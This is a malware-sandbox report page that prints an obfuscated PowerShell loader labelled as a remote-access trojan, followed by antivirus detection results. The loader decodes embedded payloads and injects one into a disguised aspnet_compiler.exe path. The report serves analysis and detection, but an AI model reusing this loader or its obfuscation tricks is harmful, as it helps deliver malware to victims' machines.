popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
#mY cODER 3LOSH RAT ::::::
Function HzGaJsAt([String] $u206Au202Cu202Bu200Bu202Cu200FX) {
$u206Au202Cu202Bu200Bu202Cu200FXS = [System.Collections.Generic.List[Byte]]::new()
for ($i = 0; $i -lt $u206Au202Cu202Bu200Bu202Cu200FX.Length; $i +=8) {
$u206Au202Cu202Bu200Bu202Cu200FXS.Add([Convert]::ToByte($u206Au202Cu202Bu200Bu202Cu200FX.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($u206Au202Cu202Bu200Bu202Cu200FXS.ToArray())
function DEHZ {
param($Alosh)
$Alosh = $Alosh -split '(..)' | ? { $_ }
ForEach ($JSEYHESSS325 in $Alosh){
[Convert]::ToInt32($JSEYHESSS325,16)
$Ediiit = '4D5@9%%%%3%%%%%%%4%%%%%%FFFF%%%%B8%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%8%%%%%%%%E!FB@%E%%B4%9CD2!B8%!4CCD2!546869732%7%726F67726!6D2%636!6E6E6F742%62652%72756E2%696E2%444F532%6D6F64652E%D%D%@24%%%%%%%%%%%%%%5%45%%%%4C%!%3%%8@25%B65%%%%%%%%%%%%%%%%E%%%%2%!%B%!%8%%%%F8%%%%%%%@%%%%%%%%%%%%CE!6%!%%%%2%%%%%%%2%%!%%%%%%4%%%%%2%%%%%%%%2%%%%%4%%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%6%%!%%%%%2%%%%%%%%%%%%%2%%6%85%%%%!%%%%%!%%%%%%%%%!%%%%%!%%%%%%%%%%%%%!%%%%%%%%%%%%%%%%%%%%%%%78!6%!%%53%%%%%%%%2%%!%%FF%7%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%!%%%C%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%%8%%%%%%%%%%%%%%%%%%%%%%%82%%%%%48%%%%%%%%%%%%%%%%%%%%%%2E74657874%%%%%%D4F6%%%%%%2%%%%%%%F8%%%%%%%2%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%6%2E72737263%%%%%%FF%7%%%%%%2%%!%%%%%8%%%%%%F@%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%4%2E72656C6F63%%%%%C%%%%%%%%4%%!%%%%%2%%%%%%%2%!%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%42%%%%%%%%%%%%%%%%%%%%%
$geGWHZ = '4D5@9%%%%3%%%%%%%4%%%%%%FFFF%%%%B8%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%8%%%%%%%%E!FB@%E%%B4%9CD2!B8%!4CCD2!546869732%7%726F67726!6D2%636!6E6E6F742%62652%72756E2%696E2%444F532%6D6F64652E%D%D%@24%%%%%%%%%%%%%%5%45%%%%4C%!%3%%3E7C36@7%%%%%%%%%%%%%%%%E%%%%E2!%B%!3%%%%%E8%%%%%%%6%%%%%%%%%%%%9E%7%!%%%%2%%%%%%%2%%!%%%%%%4%%%%%2%%%%%%%%2%%%%%4%%%%%%%%%%%%%%%6%%%%%%%%%%%%%%%%6%%!%%%%%2%%%%%%%%%%%%%3%%6%85%%%%!%%%%%!%%%%%%%%%!%%%%%!%%%%%%%%%%%%%%F%%%%%%%%%%%%%%%%%%%%%%5%%7%!%%4B%%%%%%%%2%%!%%64%3%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%!%%%C%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%%8%%%%%%%%%%%%%%%%%%%%%%%82%%%%%48%%%%%%%%%%%%%%%%%%%%%%2E74657874%%%%%%@4E7%%%%%%2%%%%%%%E8%%%%%%%2%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%6%2E72737263%%%%%%64%3%%%%%%2%%!%%%%%4%%%%%%E@%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%4%2E72656C6F63%%%%%C%%%%%%%%4%%!%%%%%2%%%%%%EE%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%42%%%%%%%%%%%%%%%%%%%%%
[byte[]]$UUSW23 = DEHZ $Ediiit
[byte[]]$JESTW3ERH2 = DEHZ $geGWHZ
$SJEWS4 = (HzGaJsAt("-X-X-X-XXX-1-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-1111-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX-111-X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-111-X-X-X-XXX-1-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1".Replace('-X-X-X-XXX-','0')))
$JDRU32 = (HzGaJsAt("0-X-X-X-XXX-00-X-X-X-XXX-00-X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX-0-X-X-X-XXX-".Replace('-X-X-X-XXX-','1')))
$JSEEESWR = 'C:\Wi-X-X-X-XXX--X-X-X-XXX-nd-X-X-X-XXX--X-X-X-XXX-ows\Mi-X-X-X-XXX--X-X-X-XXX-cro-X-X-X-XXX--X-X-X-XXX-soft.NET\Frame-X-X-X-XXX--X-X-X-XXX-work\v4.0.30319\asp-X-X-X-XXX--X-X-X-XXX-net_com-X-X-X-XXX--X-X-X-XXX-pi-X-X-X-XXX--X-X-X-XXX-ler.-X-X-X-XXX--X-X-X-XXX-e-X-X-X-XXX--X-X-X-XXX-x-X-X-X-XXX--X-X-X-XXX-e'
Sleep 1
$u206Au202Cu202Bu200Bu202Cu200F = [System.Reflection.Assembly]
$ncrx3 = $u206Au202Cu202Bu200Bu202Cu200F::Load(($JESTW3ERH2))
} catch { }
try
Sleep 1
$EUS3W3 = $ncrx3.GetType('N' +'e' +'wP' +'E2.PE');
$EUZW = $EUS3W3.'GetMethod'($SJEWS4);
} catch { }
try
Sleep 1
$HYYAW42 = $JSEEESWR.Replace("-X-X-X-XXX--X-X-X-XXX-", "")
$SEYEYHHSSSSSSW = [object[]]($HYYAW42, $UUSW23)
Sleep 1
$EUZW.$JDRU32.Invoke($null, $SEYEYHHSSSSSSW)
} catch { }
} catch { }
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec Backdoor.ASync!gm
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
Ikarus Trojan.MSIL.Agent
GData Clean
Jiangmin Clean
Google Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
Microsoft Clean
Varist Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.